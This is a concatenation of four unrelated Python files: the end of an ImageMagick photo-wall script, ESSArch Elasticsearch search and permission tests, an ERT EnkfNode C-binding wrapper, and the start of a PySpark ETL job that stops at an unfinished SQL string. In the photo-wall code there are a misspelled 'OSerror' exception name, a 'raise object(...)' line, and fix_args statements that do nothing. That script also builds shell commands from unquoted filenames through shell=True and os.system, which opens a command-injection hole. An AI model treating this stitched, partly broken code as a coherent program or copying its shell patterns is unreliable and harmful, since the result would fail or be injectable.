    PARAMS = dict(PARAMS, **param_args)

###########################################

###########################################

previous = None
def get_next_file_vfs():
  global previous
  if previous is not None:
    try:
      os.unlink(previous)
    except OSerror:
      pass
    
  files = os.listdir(PARAMS["PATH"])
  for filename in files:
    if not "By Years" in filename:
      previous = PARAMS["PATH"]+filename
      if "gpx" in previous:
        return get_next_file()
      to_return = previous
      try:
        to_return = os.readlink(to_return)
      except OSError:
        pass

      if not PARAMS["NO_SWITCH_TO_MINI"]:
        to_return = to_return.replace("/images/", "/miniatures/") + ".png"
      return to_return

def get_file_details(filename):
  try:
    link = filename
    try:
      link = os.readlink(filename)
    except OSError:
      pass
    link = pipes.quote(link)
    names = link[link.index("/miniatures/" if not PARAMS["NO_SWITCH_TO_MINI"] else "/images"):].split("/")[2:]
    theme, year, album, fname = names
    
    return "%s (%s)" % (album, theme)
  except Exception as e:
    #print("Cannot get details from {}: {}".format(filename, e))
    fname = get_file_details_dir(filename)
    fname = fname.rpartition(".")[0]
    fname = fname.replace("_", "\n")
    return fname

###########################################

class GetFileDir:
  def __init__(self, randomize):
    self.idx = 0
    self.files = os.listdir(PARAMS["PATH"])
    
    if len(self.files) == 0:
      raise EnvironmentError("No file available")
    
    self.files.sort()
    
    if randomize:
      print("RANDOMIZE")
      random.shuffle(self.files)
  
  def get_next_file(self):
    to_return = self.files[self.idx]
    
    self.idx += 1 
    self.idx %= len(self.files) 
    
    return PARAMS["PATH"]+to_return
  
def get_file_details_dir(filename):
  return filename[filename.rindex("/")+1:]

###########################################
###########################################


def do_append(first, second, underneath=False):
  sign = "-" if underneath else "+"
  background = "-background black" if PARAMS["DO_POLAROID"] else ""
  command = "convert -gravity center %s %sappend %s %s %s" % (background, sign, first, second, first)
  ret = subprocess.call(command, shell=True)
  
  if ret != 0:
    raise Exception("Command failed: ", command)

def do_polaroid (image, filename=None, background="black", suffix=None):
  if suffix is None:
    suffix = PARAMS["IMG_FORMAT_SUFFIX"]
  tmp = tempfile.NamedTemporaryFile(delete=False, suffix=suffix)
  tmp.close()
  image.save(filename=tmp.name)
  
  if not(PARAMS["WANT_NO_CAPTION"]) and filename:
    details = get_file_details(filename)
    caption = """-caption "%s" """ % details.replace("'", "\\'")
  else:
    caption = ""
    
  command = "convert -bordercolor snow -background %(bg)s -gravity center %(caption)s +polaroid %(name)s %(name)s" % {"bg" : background, "name":tmp.name, "caption":caption}
    
  ret = subprocess.call(command, shell=True)
  if ret != 0:
    raise Exception("Command failed: "+ command)
  
  img = Image(filename=tmp.name).clone()
  
  os.unlink(tmp.name)
  
  img.resize(width=image.width, height=image.height)

  return img

def do_blank_image(height, width, filename, color="black"):
  command = "convert -size %dx%d xc:%s %s" % (width, height, color, filename)

  ret = subprocess.call(command, shell=True)

  if ret != 0:
    raise Exception("Command failed: "+ command)

def do_polaroid_and_random_composite(target_filename, target, image, filename):
  PERCENT_IN = 100
  
  image = do_polaroid(image, filename, background="transparent", suffix=".png")

  tmp = tempfile.NamedTemporaryFile(delete=False, suffix=PARAMS["IMG_FORMAT_SUFFIX"])
  image.save(filename=tmp.name)

  height = random.randint(0, target.height - image.height) - target.height/2
  width = random.randint(0, target.width - image.width) - target.width/2

  geometry = ("+" if height >= 0 else "") + str(height) + ("+" if width >= 0 else "") + str(width)

  command = "composite -geometry %s  -compose Over -gravity center %s %s %s" % (geometry, tmp.name, target_filename, target_filename)
  ret = os.system(command)
  os.unlink(tmp.name)
  
  if ret != 0:
    raise object("failed")

def photowall(name):
  output_final = None

  previous_filename = None
  #for all the rows, 
  for row in range(PARAMS["LINES"]):    
    output_row = None
    row_width = 0
    #concatenate until the image width is reached
    img_count = 0
    while row_width < PARAMS["WIDTH"]:
      # get a new file, or the end of the previous one, if it was split
      filename = get_next_file() if previous_filename is None else previous_filename
      mimetype = None
      previous_filename = None
      
      # get a real image
      if mime is not None:
        mimetype = mime.from_file(filename)
        if "symbolic link" in mimetype:
          filename = os.readlink(filename)
          mimetype = mime.from_file(filename)
        
        if not "image" in mimetype:
          continue
      else:
        try:
          filename = os.readlink(filename)
        except OSError:
          pass
      
      updateCB.newImage(row, img_count, filename)
      img_count += 1
      # resize the image
      image = Image(filename=filename)
      with image.clone() as clone:
        factor = float(PARAMS["LINE_HEIGHT"])/clone.height
        clone.resize(height=PARAMS["LINE_HEIGHT"], width=int(clone.width*factor))
        #if the new image makes an overflow
        if row_width + clone.width  > PARAMS["WIDTH"]:
          #compute how many pixels will overflow
          overflow = row_width + clone.width - PARAMS["WIDTH"]
          will_fit = clone.width - overflow
          
          if PARAMS["DO_POLAROID"] and will_fit < PARAMS["CROP_SIZE"]:
            row_width = PARAMS["WIDTH"]
            previous_filename = filename
            print("Doesn't fit")
            continue
          
          if PARAMS["DO_WRAP"]:
            with clone.clone() as next_img:
              next_img.crop(will_fit+1, 0, width=overflow, height=PARAMS["LINE_HEIGHT"])
              tmp = tempfile.NamedTemporaryFile(delete=False, suffix=PARAMS["IMG_FORMAT_SUFFIX"])
              tmp.close()
              next_img.save(filename=tmp.name)
              previous_filename = tmp.name
          clone.crop(0, 0, width=will_fit, height=PARAMS["LINE_HEIGHT"])
        
        if PARAMS["DO_POLAROID"]:
          clone = do_polaroid(clone, filename)
        
        tmp = tempfile.NamedTemporaryFile(delete=False, suffix=PARAMS["IMG_FORMAT_SUFFIX"])
        tmp.close()
        clone.save(filename=tmp.name)
        
        row_width += clone.width
        if output_row is not None:
          do_append(output_row.name, tmp.name)
          os.unlink(tmp.name)
        else:
          output_row = tmp
        
        updateCB.updLine(row, output_row.name)
        updateCB.checkPause()
        
        if updateCB.stopRequested():
          break
    else:
      if output_final is not None:
        do_append(output_final.name, output_row.name, underneath=True)
        os.unlink(output_row.name)
      else:
        output_final = output_row
      updateCB.newFinal(output_final.name)
  
  if output_final is not None:
    shutil.move(output_final.name, name)
    updateCB.finished(name)
  else:
    updateCB.finished(None)
    
  return name 
    
def random_wall(real_target_filename):
  name = real_target_filename
  filename = name[name.rindex("/"):]
  name = filename[:filename.index(".")]
  ext = filename[filename.index("."):]
  target_filename = tempfile.gettempdir()+"/"+name+".2"+ext
  
  try:
    #remove any existing tmp file
    os.unlink(target_filename)
  except:
    pass
  
  try:
    #if source already exist, build up on it
    os.system("cp %s %s" % (target_filename, real_target_filename))
  except:
    pass
  
  print("Target file is %s" % real_target_filename )
  target = None
  if mime is not None:
    try:
      mimetype = mime.from_file(target_filename)
      if "symbolic link" in mimetype:
        filename = os.readlink(target_filename)
        mimetype = mime.from_file(target_filename)
        
      if "image" in mimetype:
        target = Image(filename=target_filename)
      
    except IOError:
      pass

  if target is None:
    height = PARAMS["LINES"] * PARAMS["LINE_HEIGHT"]
    do_blank_image(height, PARAMS["WIDTH"], target_filename)
    target = Image(filename=target_filename)
  
  cnt = 0
  while True:
    updateCB.checkPause()
    if updateCB.stopRequested():
      break
      
    filename = get_next_file()
    print(filename)
    
    img = Image(filename=filename)
    with img.clone() as clone:
      if PARAMS["DO_RESIZE"]:
        factor = float(PARAMS["LINE_HEIGHT"])/clone.height
        clone.resize(width=int(clone.width*factor), height=int(clone.height*factor))
                     
      do_polaroid_and_random_composite(target_filename, target, clone, filename)
      updateCB.checkPause()
      if updateCB.stopRequested():
        break
      updateCB.newImage(row=cnt, filename=filename)
      updateCB.newFinal(target_filename)
      os.system("cp %s %s" % (target_filename, real_target_filename))
      cnt += 1
      
    updateCB.checkPause()
    if updateCB.stopRequested():
      break  
    time.sleep(PARAMS["SLEEP_TIME"])
    updateCB.checkPause()
    if updateCB.stopRequested():
      break
      
get_next_file = None

def path_is_jnetfs(path):
  #check if PATH is VFS or not

  df_output_lines = os.popen("df -Ph '%s'" % path).read().splitlines()
  
  return df_output_lines and "JnetFS" in df_output_lines[1]

def fix_args():
  global get_next_file
  
  if PARAMS["PATH"][-1] != "/":
    PARAMS["PATH"] += "/"  
  
  if PARAMS["FORCE_NO_VFS"]:
    PARAMS["USE_VFS"]
  elif PARAMS["FORCE_NO_VFS"]:
    PARAMS["USE_VFS"]
  else:
    PARAMS["USE_VFS"] = path_is_jnetfs(PARAMS["PATH"]) 

  if not PARAMS["USE_VFS"]:    
    get_next_file = GetFileDir(PARAMS["PICK_RANDOM"]).get_next_file
  else:
    get_next_file = get_next_file_vfs

def do_main():
  fix_args()
  
  updateCB.newExec()
  target = PARAMS["TARGET"]
  if not(PARAMS["PUT_RANDOM"]):
    photowall(target)
  else:
    random_wall(target)

if __name__== "__main__":
    do_main()

import time
from datetime import datetime
from pydoc import locate
from unittest import SkipTest

from countries_plus.models import Country
from django.conf import settings
from django.contrib.auth import get_user_model
from django.contrib.auth.models import Permission
from django.test import override_settings, tag
from django.urls import reverse
from django.utils import timezone
from django.utils.timezone import make_aware
from elasticsearch.client import IngestClient
from elasticsearch.exceptions import ConnectionError
from elasticsearch_dsl.connections import (
    connections,
    get_connection as get_es_connection,
)
from languages_plus.models import Language
from rest_framework import status
from rest_framework.test import APITestCase, APITransactionTestCase

from ESSArch_Core.agents.models import (
    Agent,
    AgentTagLink,
    AgentTagLinkRelationType,
    AgentType,
    MainAgentType,
    RefCode,
)
from ESSArch_Core.auth.models import Group, GroupType
from ESSArch_Core.configuration.models import Feature
from ESSArch_Core.ip.models import InformationPackage
from ESSArch_Core.maintenance.models import AppraisalJob
from ESSArch_Core.search import alias_migration
from ESSArch_Core.tags.documents import (
    Archive,
    Component,
    File,
    StructureUnitDocument,
)
from ESSArch_Core.tags.models import (
    Structure,
    StructureType,
    StructureUnit,
    StructureUnitType,
    Tag,
    TagStructure,
    TagVersion,
    TagVersionType,
)

User = get_user_model()


def get_test_client(nowait=False):
    client = get_es_connection('default')

    # wait for yellow status
    for _ in range(1 if nowait else 5):
        try:
            client.cluster.health(wait_for_status="yellow")
            return client
        except ConnectionError:
            time.sleep(0.1)
    else:
        # timeout
        raise SkipTest("Elasticsearch failed to start")


class ESSArchSearchBaseTestCaseMixin:
    @staticmethod
    def _get_client():
        return get_test_client()

    @classmethod
    def setUpClass(cls):
        if cls._overridden_settings:
            cls._cls_overridden_context = override_settings(**cls._overridden_settings)
            cls._cls_overridden_context.enable()

        connections.configure(**settings.ELASTICSEARCH_CONNECTIONS)
        cls.es_client = cls._get_client()

        IngestClient(cls.es_client).put_pipeline(id='ingest_attachment', body={
            'description': "Extract attachment information",
            'processors': [
                {
                    "attachment": {
                        "field": "data",
                        "indexed_chars": "-1"
                    },
                    "remove": {
                        "field": "data"
                    }
                }
            ]
        })

        super().setUpClass()

    def setUp(self):
        for _index_name, index_class in settings.ELASTICSEARCH_INDEXES['default'].items():
            doctype = locate(index_class)
            alias_migration.setup_index(doctype)

    def tearDown(self):
        self.es_client.indices.delete(index="*", ignore=404)
        self.es_client.indices.delete_template(name="*", ignore=404)


@override_settings(ELASTICSEARCH_CONNECTIONS=settings.ELASTICSEARCH_TEST_CONNECTIONS)
@tag('requires-elasticsearch')
class ESSArchSearchBaseTestCase(ESSArchSearchBaseTestCaseMixin, APITestCase):
    pass


@override_settings(ELASTICSEARCH_CONNECTIONS=settings.ELASTICSEARCH_TEST_CONNECTIONS)
@tag('requires-elasticsearch')
class ESSArchSearchBaseTransactionTestCase(ESSArchSearchBaseTestCaseMixin, APITransactionTestCase):
    pass


class ComponentSearchTestCase(ESSArchSearchBaseTestCase):
    fixtures = ['countries_data', 'languages_data']

    @classmethod
    def setUpTestData(cls):
        cls.url = reverse('search-list')
        Feature.objects.create(name='archival descriptions', enabled=True)
        cls.user = User.objects.create()
        permission = Permission.objects.get(codename='search')
        cls.user.user_permissions.add(permission)

        org_group_type = GroupType.objects.create(codename='organization')

        cls.group1 = Group.objects.create(name='group1', group_type=org_group_type)
        cls.group1.add_member(cls.user.essauth_member)

        cls.group2 = Group.objects.create(name='group2', group_type=org_group_type)
        cls.group2.add_member(cls.user.essauth_member)

        cls.component_type = TagVersionType.objects.create(name='component', archive_type=False)
        cls.archive_type = TagVersionType.objects.create(name='archive', archive_type=True)

    def setUp(self):
        super().setUp()
        self.client.force_authenticate(user=self.user)

    @staticmethod
    def create_agent():
        return Agent.objects.create(
            type=AgentType.objects.create(main_type=MainAgentType.objects.create()),
            ref_code=RefCode.objects.create(
                country=Country.objects.get(iso='SE'),
                repository_code='repo',
            ),
            level_of_detail=0,
            record_status=0,
            script=0,
            language=Language.objects.get(iso_639_1='sv'),
            create_date=timezone.now(),
        )

    def test_search_component(self):
        component_tag = Tag.objects.create()
        component_tag_version = TagVersion.objects.create(
            tag=component_tag,
            type=self.component_type,
            elastic_index="component",
        )
        Component.from_obj(component_tag_version).save(refresh='true')

        with self.subTest('without archive'):
            res = self.client.get(self.url)
            self.assertEqual(res.status_code, status.HTTP_200_OK)
            self.assertEqual(len(res.data['hits']), 1)

        structure_type = StructureType.objects.create()
        structure_template = Structure.objects.create(type=structure_type, is_template=True)

        archive_tag = Tag.objects.create()
        archive_tag_version = TagVersion.objects.create(
            tag=archive_tag,
            type=self.archive_type,
            elastic_index="archive",
        )
        self.group1.add_object(archive_tag_version)
        structure, archive_tag_structure = structure_template.create_template_instance(archive_tag)
        Archive.from_obj(archive_tag_version).save(refresh='true')

        TagStructure.objects.create(tag=component_tag, parent=archive_tag_structure, structure=structure)
        Component.index_documents(remove_stale=True)

        with self.subTest('with archive'):
            res = self.client.get(self.url)
            self.assertEqual(res.status_code, status.HTTP_200_OK)
            self.assertEqual(len(res.data['hits']), 1)
            self.assertEqual(res.data['hits'][0]['_id'], str(component_tag_version.pk))

        with self.subTest('with archive, non-active organization'):
            self.user.user_profile.current_organization = self.group2
            self.user.user_profile.save()

            res = self.client.get(self.url)
            self.assertEqual(res.status_code, status.HTTP_200_OK)
            self.assertEqual(len(res.data['hits']), 0)

    def test_filter_on_component_agent(self):
        agent = self.create_agent()

        component_tag = Tag.objects.create()
        component_tag_version = TagVersion.objects.create(
            tag=component_tag,
            type=self.component_type,
            elastic_index="component",
        )

        structure_type = StructureType.objects.create()
        structure_template = Structure.objects.create(type=structure_type, is_template=True)

        archive_tag = Tag.objects.create()
        archive_tag_version = TagVersion.objects.create(
            tag=archive_tag,
            type=self.archive_type,
            elastic_index="archive",
        )
        structure, archive_tag_structure = structure_template.create_template_instance(archive_tag)
        Archive.from_obj(archive_tag_version).save(refresh='true')

        TagStructure.objects.create(tag=component_tag, parent=archive_tag_structure, structure=structure)

        AgentTagLink.objects.create(
            agent=agent,
            tag=component_tag_version,
            type=AgentTagLinkRelationType.objects.create(),
        )
        Component.from_obj(component_tag_version).save(refresh='true')

        res = self.client.get(self.url, {'agents': str(agent.pk)})
        self.assertEqual(res.status_code, status.HTTP_200_OK)
        self.assertEqual(len(res.data['hits']), 1)
        self.assertEqual(res.data['hits'][0]['_id'], str(component_tag_version.pk))

    def test_filter_on_archive_agent(self):
        agent = self.create_agent()

        component_tag = Tag.objects.create()
        component_tag_version = TagVersion.objects.create(
            tag=component_tag,
            type=self.component_type,
            elastic_index="component",
        )

        structure_type = StructureType.objects.create()
        structure_template = Structure.objects.create(type=structure_type, is_template=True)

        archive_tag = Tag.objects.create()
        archive_tag_version = TagVersion.objects.create(
            tag=archive_tag,
            type=self.archive_type,
            elastic_index="archive",
        )
        structure, archive_tag_structure = structure_template.create_template_instance(archive_tag)
        Archive.from_obj(archive_tag_version).save(refresh='true')

        TagStructure.objects.create(tag=component_tag, parent=archive_tag_structure, structure=structure)

        AgentTagLink.objects.create(
            agent=agent,
            tag=archive_tag_version,
            type=AgentTagLinkRelationType.objects.create(),
        )
        Component.from_obj(component_tag_version).save(refresh='true')

        res = self.client.get(self.url, {'agents': str(agent.pk)})
        self.assertEqual(res.status_code, status.HTTP_200_OK)
        self.assertEqual(len(res.data['hits']), 1)
        self.assertEqual(res.data['hits'][0]['_id'], str(component_tag_version.pk))

    def test_filter_appraisal_date(self):
        component_tag = Tag.objects.create(appraisal_date=make_aware(datetime(year=2020, month=1, day=1)))
        component_tag_version = TagVersion.objects.create(
            tag=component_tag,
            type=self.component_type,
            elastic_index="component",
        )
        doc = Component.from_obj(component_tag_version)
        doc.save(refresh='true')

        with self.subTest('2020-01-01 is after or equal to 2020-01-01'):
            res = self.client.get(self.url, data={'appraisal_date_after': '2020-01-01'})
            self.assertEqual(res.status_code, status.HTTP_200_OK)
            self.assertEqual(len(res.data['hits']), 1)

        with self.subTest('2020-01-01 not after 2020-01-02'):
            res = self.client.get(self.url, data={'appraisal_date_after': '2020-01-02'})
            self.assertEqual(res.status_code, status.HTTP_200_OK)
            self.assertEqual(len(res.data['hits']), 0)

        with self.subTest('2020-01-01 not before 2019-12-31'):
            res = self.client.get(self.url, data={'appraisal_date_before': '2019-12-31'})
            self.assertEqual(res.status_code, status.HTTP_200_OK)
            self.assertEqual(len(res.data['hits']), 0)

        with self.subTest('2020-01-01 between 2019-01-01 and 2020-01-01'):
            res = self.client.get(self.url, data={
                'appraisal_date_after': '2019-01-01',
                'appraisal_date_before': '2020-01-01',
            })
            self.assertEqual(res.status_code, status.HTTP_200_OK)
            self.assertEqual(len(res.data['hits']), 1)

        with self.subTest('2020-01-01 between 2020-01-01 and 2020-12-31'):
            res = self.client.get(self.url, data={
                'appraisal_date_after': '2020-01-01',
                'appraisal_date_before': '2020-12-31',
            })
            self.assertEqual(res.status_code, status.HTTP_200_OK)
            self.assertEqual(len(res.data['hits']), 1)

        with self.subTest('2020-01-01 not between 2020-01-02 and 2020-12-31'):
            res = self.client.get(self.url, data={
                'appraisal_date_after': '2020-01-02',
                'appraisal_date_before': '2020-12-31',
            })
            self.assertEqual(res.status_code, status.HTTP_200_OK)
            self.assertEqual(len(res.data['hits']), 0)

        with self.subTest('2020-01-01 not between 2019-01-01 and 2019-12-31'):
            res = self.client.get(self.url, data={
                'appraisal_date_after': '2019-01-01',
                'appraisal_date_before': '2019-12-31',
            })
            self.assertEqual(res.status_code, status.HTTP_200_OK)
            self.assertEqual(len(res.data['hits']), 0)

        with self.subTest('invalid range 2020-12-31 - 2020-01-01'):
            res = self.client.get(self.url, data={
                'appraisal_date_after': '2020-12-31',
                'appraisal_date_before': '2020-01-01',
            })
            self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)

    def test_add_results_to_appraisal(self):
        component_tag = Tag.objects.create()
        component_tag_version = TagVersion.objects.create(
            name='foo',
            tag=component_tag,
            type=self.component_type,
            elastic_index="component",
        )
        Component.from_obj(component_tag_version).save(refresh='true')

        component_tag2 = Tag.objects.create()
        component_tag_version2 = TagVersion.objects.create(
            name='bar',
            tag=component_tag2,
            type=self.component_type,
            elastic_index="component",
        )
        Component.from_obj(component_tag_version2).save(refresh='true')

        # test that we don't try to add structure units matched by query to job
        structure = Structure.objects.create(type=StructureType.objects.create(), is_template=False)
        structure_unit = StructureUnit.objects.create(
            name='foo',
            structure=structure, type=StructureUnitType.objects.create(structure_type=structure.type),
        )
        StructureUnitDocument.from_obj(structure_unit).save(refresh='true')

        appraisal_job = AppraisalJob.objects.create()
        res = self.client.get(self.url, data={
            'q': 'foo',
            'add_to_appraisal': appraisal_job.pk
        })
        self.assertEqual(res.status_code, status.HTTP_200_OK)
        self.assertCountEqual(appraisal_job.tags.all(), [component_tag])

        res = self.client.get(self.url, data={
            'add_to_appraisal': appraisal_job.pk
        })
        self.assertEqual(res.status_code, status.HTTP_200_OK)
        self.assertCountEqual(appraisal_job.tags.all(), [component_tag, component_tag2])


class DocumentSearchTestCase(ESSArchSearchBaseTestCase):
    fixtures = ['countries_data', 'languages_data']

    @classmethod
    def setUpTestData(cls):
        cls.url = reverse('search-list')
        Feature.objects.create(name='archival descriptions', enabled=True)

        org_group_type = GroupType.objects.create(codename='organization')
        cls.group = Group.objects.create(group_type=org_group_type)
        cls.component_type = TagVersionType.objects.create(name='component', archive_type=False)
        cls.archive_type = TagVersionType.objects.create(name='archive', archive_type=True)

    def setUp(self):
        super().setUp()

        permission = Permission.objects.get(codename='search')
        self.user = User.objects.create()
        self.user.user_permissions.add(permission)
        self.group.add_member(self.user.essauth_member)

        self.client.force_authenticate(user=self.user)

    def test_search_document_in_ip_with_other_user_responsible_without_permission_to_see_it(self):
        other_user = User.objects.create(username='other')
        self.group.add_member(other_user.essauth_member)

        ip = InformationPackage.objects.create(responsible=other_user)
        self.group.add_object(ip)

        document_tag = Tag.objects.create(information_package=ip)
        document_tag_version = TagVersion.objects.create(
            tag=document_tag,
            type=self.component_type,
            elastic_index="document",
        )
        File.from_obj(document_tag_version).save(refresh='true')

        res = self.client.get(self.url)
        self.assertEqual(res.status_code, status.HTTP_200_OK)
        self.assertEqual(len(res.data['hits']), 0)

    def test_search_document_in_ip_with_other_user_responsible_with_permission_to_see_it(self):
        self.user.user_permissions.add(Permission.objects.get(codename='see_other_user_ip_files'))

        other_user = User.objects.create(username='other')
        self.group.add_member(other_user.essauth_member)

        ip = InformationPackage.objects.create(responsible=other_user)
        self.group.add_object(ip)

        document_tag = Tag.objects.create(information_package=ip)
        document_tag_version = TagVersion.objects.create(
            tag=document_tag,
            type=self.component_type,
            elastic_index="document",
        )
        File.from_obj(document_tag_version).save(refresh='true')

        res = self.client.get(self.url)
        self.assertEqual(res.status_code, status.HTTP_200_OK)
        self.assertEqual(len(res.data['hits']), 1)
        self.assertEqual(res.data['hits'][0]['_id'], str(document_tag_version.pk))


class SecurityLevelTestCase(ESSArchSearchBaseTestCase):
    fixtures = ['countries_data', 'languages_data']

    @classmethod
    def setUpTestData(cls):
        cls.url = reverse('search-list')
        Feature.objects.create(name='archival descriptions', enabled=True)
        cls.component_type = TagVersionType.objects.create(name='component', archive_type=False)
        cls.security_levels = [1, 2, 3, 4, 5]

    def setUp(self):
        super().setUp()

        self.user = User.objects.create()
        permission = Permission.objects.get(codename='search')
        self.user.user_permissions.add(permission)
        self.client.force_authenticate(user=self.user)

    def test_user_with_no_security_level(self):
        component_tag = Tag.objects.create()
        component_tag_version = TagVersion.objects.create(
            tag=component_tag,
            type=self.component_type,
            elastic_index="component",
            security_level=None,
        )
        Component.from_obj(component_tag_version).save(refresh='true')

        with self.subTest('no security level'):
            res = self.client.get(self.url)
            self.assertEqual(res.status_code, status.HTTP_200_OK)
            self.assertEqual(len(res.data['hits']), 1)
            self.assertEqual(res.data['hits'][0]['_id'], str(component_tag_version.pk))

        for lvl in self.security_levels[1:]:
            with self.subTest(f'security level {lvl}'):
                component_tag_version.security_level = lvl
                component_tag_version.save()
                Component.from_obj(component_tag_version).save(refresh='true')

                res = self.client.get(self.url)
                self.assertEqual(res.status_code, status.HTTP_200_OK)
                self.assertEqual(len(res.data['hits']), 0)

    def test_user_with_security_level_3(self):
        self.user.user_permissions.add(Permission.objects.get(codename='security_level_3'))
        self.user = User.objects.get(pk=self.user.pk)

        component_tag = Tag.objects.create()
        component_tag_version = TagVersion.objects.create(
            tag=component_tag,
            type=self.component_type,
            elastic_index="component",
            security_level=None,
        )
        Component.from_obj(component_tag_version).save(refresh='true')

        with self.subTest('no security level'):
            res = self.client.get(self.url)
            self.assertEqual(res.status_code, status.HTTP_200_OK)
            self.assertEqual(len(res.data['hits']), 1)
            self.assertEqual(res.data['hits'][0]['_id'], str(component_tag_version.pk))

        for lvl in self.security_levels:
            with self.subTest(f'security level {lvl}'):
                component_tag_version.security_level = lvl
                component_tag_version.save()
                Component.from_obj(component_tag_version).save(refresh='true')

                if lvl == 3:
                    res = self.client.get(self.url)
                    self.assertEqual(res.status_code, status.HTTP_200_OK)
                    self.assertEqual(len(res.data['hits']), 1)
                    self.assertEqual(res.data['hits'][0]['_id'], str(component_tag_version.pk))
                else:
                    res = self.client.get(self.url)
                    self.assertEqual(res.status_code, status.HTTP_200_OK)
                    self.assertEqual(len(res.data['hits']), 0)

    def test_user_with_multiple_security_levels(self):
        self.user.user_permissions.add(
            Permission.objects.get(codename='security_level_1'),
            Permission.objects.get(codename='security_level_3'),
        )
        self.user = User.objects.get(pk=self.user.pk)

        component_tag = Tag.objects.create()
        component_tag_version = TagVersion.objects.create(
            tag=component_tag,
            type=self.component_type,
            elastic_index="component",
            security_level=None,
        )
        Component.from_obj(component_tag_version).save(refresh='true')

        with self.subTest('no security level'):
            res = self.client.get(self.url)
            self.assertEqual(res.status_code, status.HTTP_200_OK)
            self.assertEqual(len(res.data['hits']), 1)
            self.assertEqual(res.data['hits'][0]['_id'], str(component_tag_version.pk))

        for lvl in self.security_levels:
            with self.subTest(f'security level {lvl}'):
                component_tag_version.security_level = lvl
                component_tag_version.save()
                Component.from_obj(component_tag_version).save(refresh='true')

                if lvl in [1, 3]:
                    res = self.client.get(self.url)
                    self.assertEqual(res.status_code, status.HTTP_200_OK)
                    self.assertEqual(len(res.data['hits']), 1)
                    self.assertEqual(res.data['hits'][0]['_id'], str(component_tag_version.pk))
                else:
                    res = self.client.get(self.url)
                    self.assertEqual(res.status_code, status.HTTP_200_OK)
                    self.assertEqual(len(res.data['hits']), 0)

#  Copyright (C) 2012  Statoil ASA, Norway. 
#   
#  The file 'enkf_node.py' is part of ERT - Ensemble based Reservoir Tool. 
#   
#  ERT is free software: you can redistribute it and/or modify 
#  it under the terms of the GNU General Public License as published by 
#  the Free Software Foundation, either version 3 of the License, or 
#  (at your option) any later version. 
#   
#  ERT is distributed in the hope that it will be useful, but WITHOUT ANY 
#  WARRANTY; without even the implied warranty of MERCHANTABILITY or 
#  FITNESS FOR A PARTICULAR PURPOSE.   
#   
#  See the GNU General Public License at <http://www.gnu.org/licenses/gpl.html> 
#  for more details.
from ert.cwrap import BaseCClass, CWrapper
from ert.enkf import ENKF_LIB, EnkfFs, NodeId
from ert.enkf.data import EnkfConfigNode, GenKw, GenData, CustomKW
from ert.enkf.enums import ErtImplType

class EnkfNode(BaseCClass):
    def __init__(self, config_node, private=False):
        assert isinstance(config_node, EnkfConfigNode)

        if private:
            c_pointer = EnkfNode.cNamespace().alloc_private(config_node)
        else:
            c_pointer = EnkfNode.cNamespace().alloc(config_node)

        super(EnkfNode, self).__init__(c_pointer, config_node, True)

    def valuePointer(self):
        return EnkfNode.cNamespace().value_ptr(self)

    def asGenData(self):
        """ @rtype: GenData """
        impl_type = EnkfNode.cNamespace().get_impl_type(self)
        assert impl_type == ErtImplType.GEN_DATA

        return GenData.createCReference(self.valuePointer(), self)

    def asGenKw(self):
        """ @rtype: GenKw """
        impl_type = EnkfNode.cNamespace().get_impl_type(self)
        assert impl_type == ErtImplType.GEN_KW

        return GenKw.createCReference(self.valuePointer(), self)

    def asCustomKW(self):
        """ @rtype: CustomKW """
        impl_type = EnkfNode.cNamespace().get_impl_type(self)
        assert impl_type == ErtImplType.CUSTOM_KW

        return CustomKW.createCReference(self.valuePointer(), self)

    def tryLoad(self, fs, node_id):
        """
        @type fs: EnkfFS
        @type node_id: NodeId
        @rtype: bool
        """
        assert isinstance(fs, EnkfFs)
        assert isinstance(node_id, NodeId)

        return EnkfNode.cNamespace().try_load(self, fs, node_id)

    def name(self):
        return EnkfNode.cNamespace().get_name(self)

    def load(self, fs, node_id):
        if not self.tryLoad(fs, node_id):
            raise Exception("Could not load node: %s iens: %d report: %d" % (self.name(), node_id.iens, node_id.report_step))

    def save(self, fs, node_id):
        assert isinstance(fs, EnkfFs)
        assert isinstance(node_id, NodeId)
        
        EnkfNode.cNamespace().store(self, fs, True, node_id)

    def free(self):
        EnkfNode.cNamespace().free(self)


cwrapper = CWrapper(ENKF_LIB)
cwrapper.registerObjectType("enkf_node", EnkfNode)

EnkfNode.cNamespace().free = cwrapper.prototype("void enkf_node_free(enkf_node)")
EnkfNode.cNamespace().alloc = cwrapper.prototype("c_void_p enkf_node_alloc(enkf_node)")
EnkfNode.cNamespace().alloc_private = cwrapper.prototype("c_void_p enkf_node_alloc_private_container(enkf_node)")
EnkfNode.cNamespace().get_name = cwrapper.prototype("char* enkf_node_get_key(enkf_node)")

EnkfNode.cNamespace().value_ptr = cwrapper.prototype("c_void_p enkf_node_value_ptr(enkf_node)")

EnkfNode.cNamespace().try_load = cwrapper.prototype("bool enkf_node_try_load(enkf_node, enkf_fs, node_id)")
EnkfNode.cNamespace().get_impl_type = cwrapper.prototype("ert_impl_type_enum enkf_node_get_impl_type(enkf_node)")
EnkfNode.cNamespace().store = cwrapper.prototype("void enkf_node_store(enkf_node, enkf_fs, bool, node_id)")

#coding=UTF-8
from pyspark import SparkContext, SparkConf, SQLContext, Row, HiveContext
from pyspark.sql.types import *
from datetime import date, datetime, timedelta
import sys, re, os

st = datetime.now()
conf = SparkConf().setAppName('PROC_A_SUBJECT_D002015').setMaster(sys.argv[2])
sc = SparkContext(conf = conf)
sc.setLogLevel('WARN')
if len(sys.argv) > 5:
    if sys.argv[5] == "hive":
        sqlContext = HiveContext(sc)
else:
    sqlContext = SQLContext(sc)
hdfs = sys.argv[3]
dbname = sys.argv[4]

#处理需要使用的日期
etl_date = sys.argv[1]
#etl日期
V_DT = etl_date  
#上一日日期
V_DT_LD = (date(int(etl_date[0:4]), int(etl_date[4:6]), int(etl_date[6:8])) + timedelta(-1)).strftime("%Y%m%d")
#月初日期
V_DT_FMD = date(int(etl_date[0:4]), int(etl_date[4:6]), 1).strftime("%Y%m%d") 
#上月末日期
V_DT_LMD = (date(int(etl_date[0:4]), int(etl_date[4:6]), 1) + timedelta(-1)).strftime("%Y%m%d")
#10位日期
V_DT10 = (date(int(etl_date[0:4]), int(etl_date[4:6]), int(etl_date[6:8]))).strftime("%Y-%m-%d")
V_STEP = 0

ACRM_F_CI_ASSET_BUSI_PROTO = sqlContext.read.parquet(hdfs+'/ACRM_F_CI_ASSET_BUSI_PROTO/*')
ACRM_F_CI_ASSET_BUSI_PROTO.registerTempTable("ACRM_F_CI_ASSET_BUSI_PROTO")

#任务[21] 001-01::
V_STEP = V_STEP + 1

sql = """
